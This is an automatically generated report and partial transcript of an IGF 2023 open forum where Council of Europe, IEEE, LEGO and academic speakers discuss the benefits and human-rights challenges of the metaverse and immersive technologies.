Benefits and challenges of the immersive realities | IGF 2023 Open Forum #20

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Patrick Penninckx

The Council of Europe is actively examining the impact of new technological developments, such as AI and immersive realities, on human rights, the rule of law, and democracy. They recognize the importance of ensuring that these advancements uphold these fundamental values. To achieve this, the Council is partnering with IEEE to study the metaverse and its potential impact on human rights.

Guiding the development of the metaverse, the Council of Europe emphasizes the need for clear benchmarks that uphold human rights principles. They also highlight the importance of transparency, accountability, and the protection of digital rights within this emerging technology. Additionally, they stress the significance of involving multiple stakeholders, including the technical community, civil society, businesses, and academics, in decision-making processes regarding the metaverse.

Regarding immersive realities, concerns arise about the ethical decision-making process within private businesses. The Council of Europe acknowledges the risks posed by allowing private businesses to solely determine the development of immersive technologies, and calls for a more inclusive approach involving various stakeholders.

The Council also addresses the implications of immersive realities on privacy, with the collection of new forms of data like biometric and psychographic information. They highlight the potential for issues such as misinformation, disinformation, and freedom of expression. They also emphasize the need for inclusive access to immersive realities, particularly in light of the digital divide exposed by the COVID-19 pandemic.

In terms of governance principles, the Council of Europe has worked on data protection, cybercrime, and artificial intelligence. They are currently identifying ethical principles and existing legislation relevant to the metaverse, as well as addressing any gaps that need to be filled. They also express concerns about the influence of technology on human thought processes and freedom of conscience, stressing the need for careful consideration of these aspects.

In conclusion, the Council of Europe’s work on the impact of new technological developments on human rights, the rule of law, and democracy reflects their commitment to ensuring that these advancements align with fundamental values. Their partnership with IEEE to study the metaverse is a significant step in this direction. The Council emphasizes transparency, accountability, digital rights protection, and multi-stakeholder involvement. They are actively addressing privacy concerns, combating misinformation, and promoting inclusive access to immersive technologies, all while upholding human rights and societal values.

Audience

During the discussion, the speakers expressed concerns about the potential access to comprehensive biometric details in the virtual realms. Users’ immersion into these realms could enable the collection of biometric data such as eye tracking, brain activity, and heart rate. Nina Jane Patel specifically raised concerns about this potential breach of privacy and advocated for the need for regulation and governance on such intimate data in the metaverse. There is a perceived risk of individuals’ biometric data being misused in this virtual environment, highlighting the importance of safeguarding privacy and ensuring data protection.

Another concern raised during the discussion was the impact of immersive technologies on privacy, freedom of conscience, and psychophysical integrity. The speaker from Poland had different considerations regarding privacy and freedom of conscience in the face of these technologies. It was acknowledged that there are technical challenges involved in maintaining the psychophysical integrity of individuals and protecting their freedom of conscience within immersive environments. The speaker’s suggestion was to focus on developing technical solutions to handle these issues.

Content moderation in the metaverse was also a topic of concern. The Clinical Executive Director of the UCLA Institute for Technology Law and Policy highlighted the lack of effective tools for moderating content at scale in these new technologies. The current standards that exist for traditional social media platforms cannot be effectively followed in the metaverse. This raises questions about maintaining safety and regulating content in this evolving virtual space.

Furthermore, it was noted that the impacts of the metaverse will vary based on socioeconomic and geographical disparities. Steve Fosley from UNICEF pointed out that the cost of metaverse technology, such as VR headsets, could be prohibitive for some individuals. Not everyone will have the same quality of access to these technologies, and some may interact with artificial intelligence (AI) and the metaverse in less immersive and sophisticated ways. This highlights the potential for increased inequalities based on access and resources.

Overall, the discussion highlighted concerns about the access and misuse of biometric data, the need for governance and regulation in the metaverse, the impact of immersive technologies on privacy and freedom of conscience, the lack of effective content moderation tools, and the potential for disparities in the metaverse based on socioeconomic and geographical factors. The analysis provides valuable insights into the challenges and considerations surrounding the development and implementation of these emerging technologies.

Irene Kitsara

The increasing use of virtual realms has opened up new possibilities for accessing biometric data, including eye tracking, brain activity, and heart rate. This wealth of information has necessitated a rethink of privacy in response to this emerging technology. Experts have recognized the need to address the potential implications and consequences of such data collection.

One suggested solution is the introduction of “neural rights.” In fact, Chile has already incorporated neural rights into its constitution, demonstrating a growing recognition of the need to protect individuals’ rights and data in the context of advancing virtual realms.

Not only do individuals directly involved in virtual experiences require protection, but the concept of bystander privacy is also a concern. Bystander privacy refers to the privacy of those who may be indirectly captured or impacted by data collection, such as other individuals in the same room as a virtual reality user. Addressing this issue is crucial to ensure the protection and respect of personal privacy in all aspects of virtual realm usage.

When it comes to data governance, experts are divided on the best approach. Some propose self-regulation principles, where individuals, organizations, and industries voluntarily adhere to established guidelines and standards. Others suggest the reinterpretation of existing laws to adapt to the challenges posed by virtual realms. Lastly, the introduction of new laws is also considered a potential avenue for regulating biometric data and ensuring ethical practices.

In conclusion, the growing immersion into virtual realms and the accessibility of biometric data have raised important discussions regarding privacy and data governance. The concept of neural rights has emerged as a potential solution, and bystander privacy is also of significant concern. The best path for data governance remains a topic of debate, with options ranging from self-regulation to the introduction of new legislation.

Adam Ingle

The metaverse and immersive technology have the potential to revolutionise connections among children. Research conducted with UNICEF suggests that social connection plays a vital role in child well-being online, and the metaverse has the capability to enhance this through its connectivity and personalisation features. Avatars and identity in the metaverse enable children to establish unique connections and interact with others in ways that were previously unimaginable. This incredible connectivity has the power to bridge distance and cultural barriers, fostering a global community of children.

Furthermore, the metaverse and digital platforms like Minecraft, Roblox, and Fortnite provide children with an avenue to express and enhance their creativity. These platforms allow children to build imaginative worlds and engage with various forms of artistic expression. Improved technology, interconnectivity, and layered services within the metaverse amplify the creative potential for children, allowing them to develop their creative skills and explore their unique talents.

In addition to fostering social connections and creativity, the metaverse empowers children by enabling them to build their online identity. A strong sense of identity is fundamental to a child’s personal development, and the metaverse provides a digital space for children to shape and express their identity. By creating and managing their online presence, children can gain a sense of confidence, autonomy, and empowerment.

However, it is important to implement the metaverse in a responsible and considered manner, particularly when it comes to children. The potential risks and harms associated with the metaverse necessitate the establishment of high safety standards and responsible design. A collective approach by all stakeholders is essential to address the interconnected and interoperable nature of the metaverse. By ensuring robust safety measures and responsible design, a kid-friendly ecosystem can be created within the metaverse, safeguarding the well-being and protection of children.

Regulation and legislation are key aspects of addressing the challenges and issues in the metaverse. The development of regulatory frameworks and the resolution of existing problems from Web 2.0 platforms are crucial to ensuring a safe and secure metaverse environment. By learning from the experiences and responses to Web 2.0, it is possible to establish effective measures that protect children’s rights and well-being in the metaverse.

Furthermore, it is important to observe and evaluate the evolution of current Web 2.0 regulations and cultural responses. This ongoing assessment will provide valuable insights and guidance in handling the challenges and implications of the metaverse. By learning from the past, we can adapt and develop appropriate strategies and policies to shape a responsible and inclusive metaverse for future generations.

Lego, a prominent advocate for child safety, is committed to creating kid-friendly environments in and beyond the metaverse. Lego emphasises the importance of high safety standards and aims to establish a truly immersive ecosystem that prioritises children’s well-being and protection. Their dedication acts as an example and encourages others to join in implementing stringent safety measures and creating a child-friendly metaverse.

In conclusion, the metaverse and immersive technology have the potential to revolutionise connections among children, foster creativity, and empower them. However, responsible and considered implementation is crucial to mitigate potential risks and ensure the well-being of children. Regulation, safety standards, and observing the evolution of Web 2.0 regulations are vital aspects in handling the challenges of the metaverse. By establishing a collaborative and proactive approach, a safe and inclusive environment can be created, where children can explore, learn, and connect in the metaverse.

Melodena Stephens

The Metaverse, with a potential market size of up to 13 trillion USD, is undergoing rapid adoption in various sectors. Governments, educational institutions, and retail businesses are among those embracing this concept. Cities and countries are implementing digital twin strategies, while industries like manufacturing are creating digital twins for their operations. Education and healthcare sectors are also driving the adoption of Metaverse technologies. However, concerns about employment, behavioural addiction, environmental impact, cultural representation, and the need for effective governance have been raised. Collaboration, transparency, and careful consideration of social and ethical implications are crucial in harnessing the full potential of the Metaverse while mitigating risks.

Hugh

The concept of the metaverse, which was first introduced by Neal Stephenson in a sci-fi novel three decades ago, refers to a digital universe that could exist either alongside or as an extension of our current reality. It has garnered significant interest in the field of digital technology and is seen as the next phase of digital transformation.

Artificial intelligence (AI) plays a crucial role in the development of the metaverse, along with other technologies such as extended senses and actions (XR or spatial computing), persistent virtual worlds (persistent computing), and digital finance and economy (consensus computing). These core technologies, combined with supporting technologies like computation, storage, communications, networking, data, knowledge, and intelligence, are necessary components for creating the metaverse.

The metaverse is believed to have the potential to become the next version of the internet, redefining production and life in the process. It is seen as the natural progression from the current “intelligentization” phase, which is characterized by the rise of AI.

Hugh, in particular, holds the view that the metaverse is the next major advancement in digital transformation. He predicts that it will have a profound impact on various aspects of society, revolutionizing production methods and reshaping daily life.

Overall, the metaverse, with its integration of AI and technological advancements, presents exciting possibilities for the future. It is poised to bring about a new era in digital transformation that will have wide-reaching effects. As discussions around the metaverse continue, it will be interesting to see how these ideas evolve and shape the digital landscape in the coming years.

Clara Neppel

This analysis explores various topics related to virtual reality, immersive realities, digital twins, partnerships, and ethics. Clara Neppel, a prominent figure in this field, emphasizes the importance of architecting virtual reality in a way that encourages happiness and well-being. She believes that a multidisciplinary approach is necessary, involving not only technologists but also individuals with different perspectives such as ethics and social sciences.

Immersive realities, as highlighted in the analysis, contribute to safer flights through extensive pilot training. By allowing pilots to undergo training in immersive simulated environments, they can effectively manage challenging situations and improve their skills.

The analysis also discusses the role of generative AI in revolutionising design, particularly in the automotive industry. Immersive realities are used for testing designs, enabling designers to envision and evaluate various possibilities before implementing them in the physical world.

Digital twins, virtual replicas of cities or ourselves, play a crucial role in achieving goals related to climate and sustainable cities. By creating accurate digital representations, cities can better understand and address environmental challenges. Digital twins also offer opportunities to improve inclusive health and education by providing insights and personalised approaches to healthcare and learning.

Partnerships are highlighted as essential in achieving common goals. Collaboration among various stakeholders, including government bodies, NGOs, and private sector entities, is crucial for addressing complex challenges and advancing sustainable development.

Virtual reality is shown as a tool to help citizens understand the full impact of measures related to climate change. By creating simulated experiences, individuals can gain a deeper understanding of the consequences of their actions and make more informed decisions.

However, the analysis also points out that immersive realities and the metaverse introduce ethical challenges and issues. Concerns such as privacy, data protection, safety, and security need to be carefully addressed to ensure the responsible and ethical use of these technologies.

The governance of virtual spaces, including the metaverse, is highlighted as an area that requires a new system. Discussions are already underway regarding who should control the code and the resulting services. The concept of co-creation of infrastructure and its implications for ownership are also discussed.

The analysis raises concerns about the potential privacy issues that may arise with the omnipresence of technology in the future. It emphasizes the need to carefully navigate the balance between technological advancements and individual privacy rights.

Safety and interoperability of regulations are identified as major concerns in the deployment of AI solutions in various sectors. Poorly designed AI systems can have real impacts on individuals, particularly in the field of healthcare. Therefore, ensuring safety becomes paramount in discussions surrounding AI deployment.

The analysis emphasizes the need for interoperability of regulations through the establishment of global standards. These standards operationalise regulations and move from mere guiding principles to practical implementation.

A combined top-down and bottom-up approach is identified as crucial in developing a comprehensive framework. This approach involves considering the perspectives of both regulatory bodies and grassroots initiatives. The work of the Institute of Electrical and Electronics Engineers (IEEE) on ethically aligned design initiatives is cited as an example of a bottom-up approach.

Content moderation, both in terms of public and private control, is highlighted as a major point of discussion. Clara Neppel believes that this topic lies at the heart of discussions within the International Governance Forum.

Additionally, the importance of anonymity in exercising citizen rights is stressed. Anonymity provides individuals with the freedom to express themselves without fear of repercussions and plays a vital role in maintaining a balanced and inclusive society.

In conclusion, this analysis showcases the wide array of topics surrounding virtual reality, immersive realities, digital twins, partnerships, and ethics. It highlights the need for comprehensive approaches and collaborations to tackle the challenges and harness the potential of these technologies in a responsible and beneficial manner.

Session transcript

Irene Kitsara:
Thank you. . Good afternoon, ladies and gentlemen, and welcome to the open forum number 20 of the IGF 2023 on benefits and challenges of immersive technology. We have a number of speakers today. I will start with on-site panelists in alphabetical order. So we have with us Adam Ingle, global lead in digital policy from the Lego Group. We have Clara Neppel, senior director of European business operations at IEEE. And we have Patrick Pennix, head of the information society department from the Council of Europe, and the Council of Europe operating officer from then, the NRA, close to the network step. In remote participation, we have a professor, Melodyna Stephens, professor of innovation and technology governance from the Mohammed bin Rashid school of Government We have from IEEE ASA president. Welcome. I have the pleasure to be the moderator of this session. This is a very important report on the impact on the metaverse and its impact on human rights, the rule of law and democracy. And I will be your moderator today. So let me start by asking Patrick and Clara why the Council of Europe is organizing this session today and working on

Patrick Penninckx:
issues related to emerging technologies and also what is the role of IEEE in this. I think it is very important for the Council of Europe and the Council of Europe as a collective to always work at the edge of the developments of technology. Already in the 80s, we worked on the data protection convention. Later on, 20 years ago, we developed the cybercrime convention. So we are always trying to ensure that the new technological developments are compatible with the values of the old technology and the new technology, which is encompassed through artificial intelligence and the immersive realities. We also need to see to which extent this coincides and this reinforces or poses a certain number of challenges to the development of human rights. So I will have to start again, I guess. I will have to start again, I guess. I will have to start again, I guess. I will have to start again, I guess. What I was trying to say is that the Council of Europe has always been at the edge when it comes to the development of new technologies. When we try to look at the development of everything, automated processing of individual data already 40 years ago, or the cybercrime convention more than 20 years ago, for us it was always very important to look at the development of the new technologies and the impact of those emerging technologies and this way the immersive realities have on human rights, rule of law and democracy. to work in partnership with IEEE on looking into the metaverse and how the metaverse would impact those human rights. And that’s why we decided to organize this workshop here.

Clara Neppel:
Thank you. And thank you for having us here. So my name is Clara Neppl, and I’m the senior director of IEEE in Europe. We are based in Austria and Vienna. And on my flight here, I actually saw a documentary from a famous Austrian architect, Karl Schwantzer, who said that man creates buildings, and buildings create man. And actually, it’s the responsibility of an architect to create these buildings which make people happy. And now we are at a time when we create a completely new virtual reality, and we are the architects. And I think that we cannot do it alone as technologists. I think that we need to create an immersive reality which makes people happy, which cares for well-being, and of course, also human rights and the society. And we need to bring also in this report, that’s what we try to do, to bring different perspectives. So from a technological side, from the ethical side, social side. And yes, this is basically this bidirectional dialogue that we need to continue also for this sense. Thank you.

Irene Kitsara:
Thank you, Patrick and Clara. So we are hearing the terms metaverse, immersive realities, and also in other sessions, we have also related terms such as virtual worlds. And I think it would be good for our discussion to talk a little bit about these terms, and maybe as well as the technologies that are enabling making such realities an option and making it possible for us to experience. So with that, I would like to turn to you to provide us with his perspective on this.

Hugh:
Thank you, Irene. So as we all know, metaverse, this term was coined by Neal Stephenson in his sci-fi fiction novel back in 30 years ago. But during the past decades, this concept itself has been extended quite a bit. So let me share with you our definition of metaverse. We are trying to provide the most inclusive definition for metaverse. So in terms of metaverse, we could agree that this is talking about a digital universe. So from the experience perspective, we can say there are three types of metaverses. It could be either a digital and a different universe, or it could be a digital counterpart of our current universe, or it could be a digital extension of our current universe, which means these three different types of digital universes are corresponding to virtual reality, augmented reality, and the digital twin. So from that perspective, metaverse refers to a kind of experience in which the outside world is perceived as a universe. But from another angle, the functional view of the internet… Well, how about now? Let me say again. Could you hear me? Hello? Now we can hear you, thank you. Okay, sorry. So we know metaverse from another perspective. We call that a functional view. Metaverse could be referred to the next version of… …be the next stage of digital transformation. So with that being said, let’s take a look at the metaverse technology landscape. We can say that, of course, supporting technology is like computation. storage, communications, networking, data, and knowledge, and intelligence are all necessary for enabling metaverse. But there are also core technologies for metaverse, namely extended senses and actions. You can call that XR, or you can call that spatial computing. And the second category is persistent virtual worlds. We call that persistent computing, which is about how to create virtual maps, virtual scenes, virtual objects, and the virtual characters collectively constituting virtual worlds. And lastly, digital finance and economy, you can also call that a consensus computing, which is about digital assets, may or may not be built upon decentralization and the blockchain. So from this technology roadmap, or landscape, you can say that AI is actually an integral part of the metaverse technology landscape. So with that being said, we can say that metaverse is the next biggest thing. Why? Because if we look at the history of the digitalization, or digital transformation, we are actually between two stages. The current stage, which is already exploding, is we call that intelligentization, which is about the rise of AI, using AI everywhere. But the next phase by AI and its upcoming is the metaverse. So we are currently between these two stages. And I could also add that, as always, many of us will agree that AI is transforming production, transforming forces of production and the relations of production, but the metaverse will redefine production and redefine life. So that’s why we say metaverse is the next biggest thing. So I’ll stop here. Irene?

Irene Kitsara:
Thank you very much, Hugh. And you touched upon some of the fact, you know, that we have different areas of application of the metaverse. And I would like to now turn to Melodina and ask her about some application areas, and then move to Clara, Benefit and Adam and talk about some of the benefits. that can arise from the use of immersive experience and ways that the metaverse can also promote, for example, the human rights, the role of law and democracy. Melodina, would you like to start?

Melodena Stephens:
Thank you. So when Facebook changed its name to Meta in October 2021, the market speculated that the total size of Metaverse is 13 trillion US dollars. Over time, that number got revised and went downwards, but I do not think it is a wrong estimate at all. For the first reason is Metaverse is also hardware. So you see this doubling of computing power every 18 months. You also see a lot of the geopolitical tension is pushing the adoption of Metaverse. You can see this in the 5G wars and in the proxy wars currently going on. You also see private sectors, tremendous interest. In fact, the applied research from private sector is greater than government investment. And you see this in things like, for example, Microsoft’s acquisition of Activision Blizzard for about 69 billion US dollars. We also see governments are huge adopters, and I’m gonna go through that very briefly, but we see a standards war coming out and it’s being played by the private sector currently. You see Pokemon Go, which was an augmented reality game, got 50 million customers in 19 days. So that’s huge adoption curve. You see also a price war happening right now with Meta’s Oculus glasses priced at 500 versus Apple’s glasses priced at 3,500 all in time for Christmas. So gaming continues to drive the Metaverse right now. There’s more than 160 virtual worlds. Fortnite, for example, has half a billion customers and generates something like 6 billion US dollars. A lot of this income is also micro-purchasing. We can’t ignore other players which have huge numbers. For example, Meta with 3.88 billion users. Microsoft with most of the Fortune 500, and keep in mind, Microsoft has a Microsoft Mesh and now has Activision, that’s 92 million monthly users and Minecraft, significant number of children. Apple has 1.5 billion users entering into the payment circle and Google has 4.3 billion tens and 1.26. And we see Nvidia, which was typically a hardware provider now entering into this space. So the crossovers are very interesting and that’s why I think it’s very hard to determine market. Now, industry applications are, for example, in digital twins. We have countries adopting, well, cities, for example, in countries. UK has a digital twin strategy, for example. South Korea has one, but we also see cities adopting it. We see manufacturing, there are factories that are adopting and creating digital twins, Siemens, BMW, so definitely Germany. We see it in utility sector, Sydney Water. We see it in AdNoc, which is petroleum, oil and gas. We see 900 cities with smart cities. So with the internet of all things, I think this is also pushing the adoption of the metaverse. We have 125 billion connected devices in 2023. We see government, which historically. has contributed 40% to GDP approximately, maybe at the higher end, but also entering. So for example, tourism. During the pandemic, Dubai was present as World Expo. They had 24 physical visitors coming to the site. It was COVID after all, but 125 virtual visitors. And this becomes part of their legacy. We see KSA with Neom and Finland in Minecraft, actually, with the 3D version of Helsinki as a city. We see education as a huge adopter. Typically, it’s being pushed by engineering and health, and that’s also where a lot of the research is happening right now. There was the first surgery, but it was more to access digital records, and some work is happening on customer care. A lot on re-skilling. For example, Accenture bought 60,000 Oculus Quest headsets in 2021 for their employees, and they created the nth floor for training and for networking. We also see retail heavily getting involved in the metaverse. Typically, right now, it’s more experiences. Brands are testing it out. We’ve got luxury brands like Gucci, Burberry, fashion brands like H&M Forever 21. I mean, you name it, they are there, but they’re experimenting right now. There is no doubt we will reach 13 trillion. I think it’s a function of standards or maybe who will win the standards war, and also what is the situation with regulations. I’ll stop there right now, Irene.

Irene Kitsara:
Thank you, Melodina. Patrick?

Patrick Penninckx:
Well, well, if, is it on? Is it on? Yes, it is on. Okay, well, there are, the question that Vince Cerf just asked in the opening session of the high-level opening remarks was what is the internet we want and what is the internet we deserve? So these are two different questions, and the same goes for the metaverse. What is the metaverse we want, and which one do we deserve? I think if we want to create a metaverse that is respectful of human rights, that will enhance freedom of expression, that will be inclusive, that will be accessible, that will be fostering global connections, we need to put those milepoles and benchmarks in place, and that’s why we cannot just let digital development happen. We have to be able to steer that digital development. I wouldn’t say that we need to steer innovation. I think that is for companies to do. But we need to put those benchmarks right that make sure that there are within the metaverse also innovative educational opportunities, that there is a democratic participation, that there is a digital rights protection. We very often at the level of the Council of Europe say, what is the protection of rights that we need to do offline? We also need to do that online. If the metaverse is the next step up with the Internet of Things, with connected realities, with 5G, with quantum computing and how that interrelates all together and certain industries are very far ahead. You didn’t say that earlier on, but for example, testing of in the metaverse, how it feels to be underwater, for example. These are innovations that we need to be able to not grasp, but at least to be able to say what usage do we want it to give in the future. I could imagine that not only it gives you the feeling of jumping off a cliff into the ocean, which would be the fantastic use of the metaverse, I guess, but if we are able to use the metaverse in order to do waterboarding, this may be a completely different reality. So we need transparency, we need accountability, we need digital rights protection, and I think the experience already shows that we need to be able to give a certain guidance on that. We’re trying to do that in the technologies that are being developed. Right now we’re developing a regulation on artificial intelligence, which is a framework convention that is to be dealing with this. We hope to finalize that by mid-next year, but also in our future work plans. The metaverse is part of it and the fact that we can work together with IEEE on those kind of things seems to me essential because as we said before, it’s in this multi-stakeholder context that we need to be able to discuss that from all angles, whether that be from the technical community, from the engineers point of view, from the business point of view, but also from an ethical point of view, from civil society point of view, academic point of view, and be able to govern all of that. So I think the benefits are there and we can work towards the promotion of human rights and rule of law and democratic participation, but it’s not going to go evidently. We’ve seen that with the development of the Internet. The Internet has given us a number of opportunities. We want it to be open and transparent and flexible and worldwide, but we’re increasingly getting a more fragmented world and we also know that if we let things happen, if we want a metaverse, not want a metaverse, but if we get a metaverse we deserve, we may not be getting the metaverse we want. And I think that’s important from a human rights perspective to look at it.

Clara Neppel:
Clarence and Adam, on the benefits. Yeah, thank you. Well, I think we already heard quite a lot on the benefits. I was also thinking, again on my flight to Japan, that probably already immersive realities contributed this flight and your flight as well to be more safe because the pilot was probably trained by hours and hours in immersive realities to master a situation which we hopefully never encounter, so not very often and so this is already an immersive reality. reality which helps us. And we’re seeing now, we hear generative AI. Generative AI is going to revolutionize also design. We are going to have the car industry, which is already testing out different design options in different immersive realities. And I think that we are moving now, we heard from these digital twins of cities, and I think somebody asked to try to map it to SDG, so I will just try to do some. The obvious one of course would be the SDG 9, industry innovation and infrastructure. But if we go to the digital twins of cities and even of the planet, of course we are also touching about the SDG 13 on climate and also of sustainable cities. And we are moving to the digital twins of ourselves and I think that this is where our collaboration with the Council of Europe is going to be essential, because there we are entering a realm that we certainly cannot handle alone when it comes to human right, democracy and rule of law. And so digital twins of ourselves, what does it mean? It means of course inclusive health, health care, SDG 3, education was already mentioned, SDG 4. But what is very close to my heart is really SDG 17 and that is partnership. It’s partnership for these common goals. And I think that this is going to be now really a game-changer. Now if we’re thinking about climate change, we see quite a lot of measures which are very, very difficult to implement, because citizens don’t understand the full impact of it and there’s a lot of fear. What does it mean if a solar panel is very close to my field or if I have a wind turbine somewhere nearby? What does it mean if my city is going to implement new measures in terms of traffic control? And this is something that we can try out in the virtual reality. And we can really enhance the democratic participation that Patrick talked about. Thank you.

Adam Ingle:
Thank you. So I think the benefits have been well canvassed. But I’m from the LEGO group, so I’ll focus my comments on what it might mean for children. And really, it has tremendous potential to amplify the things that kids care about. So we’ve undertaken research alongside UNICEF to try and understand what is child well-being online, and what components and elements and building blocks actually make children feel like they’re in a positive space. One of them is social connection. I think the metaverse and the immersivity of it and the interoperability between different layers of the internet and different services can really connect children in a way that is unprecedented. You’re not just a username. You’re an avatar. You have a sense of identity that’s carried across experiences that’s built up through a history online. And that conveys a unique sense of yourself to your peers and other kids. So you can connect in a way that you haven’t been able before and that’s really what kids value. You can create in a way that you can’t do offline, even with LEGO bricks. You are able to really build these worlds around you. You’ve seen the power of Minecraft, Roblox, what’s happening in Fortnite. These are all early metaverses. As the technology improves, not just the graphics, but the interconnectivity, the layers of services, the creative potential is huge. And children learn through creation. That’s what we’ve really found. So they can do that in an even better way. You also can empower kids. They have this sense of identity. They’re online. They’re engaging. They’re building. own lives there and they really value this kind of sense of empowerment. Often you know they can find some interactions quite patronizing but you know they have a right of access to the benefits of technology and the metaverse is an avenue for that. So they can learn, create, connect, do all these things. Now I know we’re getting to the downsides later but I do want to say there’s a massive caveat to all that is you know these things need to be done in a responsible way particularly with children. So social connection you know it’s we’ve seen the harms that come through an unconsidered approach to those types of things. So the benefits are tremendous but it needs to be done right. Hopefully that’s a good segue.

Irene Kitsara:
Absolutely thank you for that and I think we have the spoiler alert in the title of the of the session about the challenges and I think this is part of what a lot of sessions in the IGF are addressing around concerns that come with emerging technologies and applications. So I would like to address this question to to all our panelists about what are the some of the challenges that could arise from immersive realities and what is the potential impact they could have on the human rights, the rule of law and democracy, remembering the organizer of the event. And let us maybe just give a bit of a background on what we have covered in the upcoming report. So we have looked into on one side the enabling environment that the immersive realities and the metaverse can create for exercising human rights and the rule of law and democracy. But other issues we have looked into were related to privacy and data protection, safety and security, protection of children and other vulnerable populations, access and accessibility issues, inclusion and non-discrimination, freedom of expression and censorship, labor environment and of course issues related to the rule of law such as territoriality, enforcement, access to justice and democracy. But before we all despair maybe let’s start by some of these issues and I will start by Clara and then we can move to Patrick, Melodina and Adam.

Clara Neppel:
Thank you. So I already mentioned that we have already very practical examples of virtual reality. So we have autonomous cars being tried out in different scenarios. But even there there are certain ethical questions. A cow on the street might have a completely different value in India than in Europe. And now if we have these digital twins or avatars or digital humans of course we are entering a completely new territory. These digital humans interacting now in a seamless interconnected space, there is, who is going to control that space? So until now these immersive realities have been, and also the rules of engagements, have been designed by private actors. Now if we have something like a public space, who is going to decide who is going to enter that space? What is acceptable behavior? And when somebody should be excluded? So here again we are also discussing about an inclusive, as much as inclusive space as possible. We already see a shift of paradigm from the moderation of control that we know from AI and social media, to the moderation of behavior and moderation of space. What does it mean to be aggressed in a virtual space? And again, if we are discussing about virtual spaces, what is a public infrastructure? To what extent can people co-create actually that infrastructure? And what does it mean then to ownership? We already see our children in Minecraft creating magnificent cities and so on. What does it mean if this is then incorporated in a private virtual space? Whose ownership is it? And again, who is dictating the rules? In the digital space we have in open source the governance of, you know, who is actually controlling what code is getting into it. We had some time ago something like a benevolent dictator. Somebody who is dictating which code should be part of that service. So are we going to have something like this in a digital space? Hopefully not. Hopefully we will have a democratic participation. And especially when it comes to such a technology which will very much influence our worldviews, because we are basically going to have a completely different perception of, let’s say, a certain environment. if we are immersed in this, who is going to, again, control how this is going to look like? What does it mean, our perception of history, of perception of reality as such? And I think we already heard about privacy. I think we are entering here into a completely new space. We are going to have this technology which is present, omnipresent. And we have to get away, let’s say, from the technologies that we hear now of the headsets. We have to think about technologies which are upcoming. Last week at a Paris fashion show, something called a human AI was presented, which was just a very small pin which is there all the time and registering basically everything, recording everything. It’s kind of a digital assistant, a Star Trek-like assistant. Question is, what would it mean to this conference if we had such a technology which is every time recording everything which is happening, recording who is talking to what, to whom, and what possibly feelings he has? So you can imagine the type of information asymmetry that we are going to have, and also the power of those who can also predict certain alliances, certain power games in the future. So you can see we have certain new aspects to existing ethical challenges, like privacy, bias, accountability. And we have also some completely new challenges. We had Tom Hanks also last week telling that there is a digital Tom Hanks around who is publicizing some dental care. He has nothing to do with this. We have more and more of these digital twins who are going to be copied, not only our physical features, but also our characteristics, the way we are talking and the way we are feeling. So how much can we actually control these digital selves or these digital feelings? Are we going to need to have an authentication not only of content, but also of these digital humans? And last but not least, I want to conclude with safety. I think that safety is also going to play a completely different role that we are discussing now in terms of AI. Maybe some of you have heard this advertisement that the metaverse is virtual, but its impact is real. And I think that’s very true. Of course, you will have a very real impact when it comes, for instance, to healthcare. But if it is not designed well, then it has a real impact on the patient. And other things which make this need of designing it the right way a very important one.

Patrick Penninckx:
Now, the human rights activists, but also organizations that stand for human rights, are very often seen as a little bit alarmist and do not see sufficiently the positive sides. But it’s also for a human rights organization to be able to point that out. Let’s say the evangelists, if I may call them that way, of the future developments, including the immersive realities, will point at the advantages. They also do serious efforts. I’m now not speaking for that business community, but it’s not as if that business community goes about developing things in a completely unethical way. They put quite a number of resources into place. Metaverse, unfortunately, or meta was unfortunately not able to… to participate in this panel discussion, but I know they do a lot of effort in order to be able to ensure that the ethical principles, human rights principles, legal principles are also being respected. I will, Adam will certainly say something more about it afterwards as well, because that’s their prime concern. Well, not their prime concern, their prime concern remains doing business, obviously. But the question is not so much how much ethical principles are being put forward by private business. It’s also to which extent this new universe is going to be regulated by private business or to which extent has a democratic society with the principles that it endorses and tries to promote. To which extent does that have an impact on the development of this new immersive reality? None of us here are immersive natives. I’m an analog native. Some of us may be digital natives. I’m not looking at anyone in particular, but none of us are immersive natives. We will have to be able to look into a completely new reality of which we do not necessarily yet see the contours. And in order to be able to see those contours, let us not be naive. I’m old enough to have looked at the start of the internet and the positive feelings about democratic governance and participation and improvement of, let’s say, grassroots democracy. But we also see that that was maybe a little bit naive and that we also see that there are a number of things that we need to ensure that especially when our societies are instead of growing more democratic, are getting more defensive of human rights, we’re regressing, we’re backsliding. So let us see what that means. If some of the information and data that have been collected, even until now, fall into the wrong hands, I think we are very badly off. Now, the metaverse of… also in the immersive realities, allows for new forms of crime, allows for new questions or has to be put new questions with regards to the jurisdiction. Where, who is going to be judge and party? Can we be judge and party? Should we not divide that? Should we not have the ones that are deciding on how the developments are taking place be separated from those who take a number of decisions with regards to the jurisdiction about it? Now, we’ve spoken about privacy, Clara mentioned it before. We’re getting into a new dimension of privacy because in order to create an immersive reality, we also need to ensure that new forms of data collection, including biometric, psychography are recorded. These are very intimate, more even, I would say, than our health data, which are sensitive data. How are they going to be governed? I think even if, who was it? Tom Hanks? No. Was it Tom Hanks? Complaints about deep fakes, I think in the future, we will be dealing with something which is far more immersive than that. I think we’re moving towards, in order to be able to represent yourself through an avatar, it basically means that you have to have a complete picture of yourself, including of your expressions, et cetera, et cetera, to make it more realistic. Will we in 30, no, in 2034, will the IGF take place in an immersive world, Irina? So these are the kind of things that we need to. ask, and what are the consequences of that for privacy and digital security? How do we identify ourselves? Not only Tom Hanks, but also everyone in our room here. What about anonymity? Can we still be anonymous? We’re outraged about video surveillance, and some countries and some cities are excelling in that, but what about anonymity? What about private life? At least for the European Convention on Human Life, privacy is one of the pillars, Article 8. What about freedom of expression? What about the counterpart of disinformation and misinformation? We see, especially now with the ongoing war, how misinformation and disinformation are being used in a 30s, 1930-like manner, but in a much more efficient manner, to be able to stifle freedom of expression, but also to control all forms of population. That immersive reality can only be an extra layer of that, and I think we need to not be naive in terms of thinking that everyone is nice. Not everyone is nice. At the IGF, of course, everyone is nice, but there are other people out there which may be not so nice, and that have different intentions on how your private information will be used. Let’s also think about inclusivity. The speeches earlier today were all about how can we make the next 2.6 billion people connect to the Internet. But how are we going to connect the next 8 billion people to the metaverse? Who is going to be included? What are the elements of inclusion? I see the potential for educational purposes and so on and so forth, but in order to be able to benefit from those educational goals, we have to be able to ensure that people can also participate. So, inclusivity, accessibility. How are we dealing with the digital divide, not only worldwide, but also within our societies? And that is something that has also been shown during the COVID crisis, how the digital divide in our countries 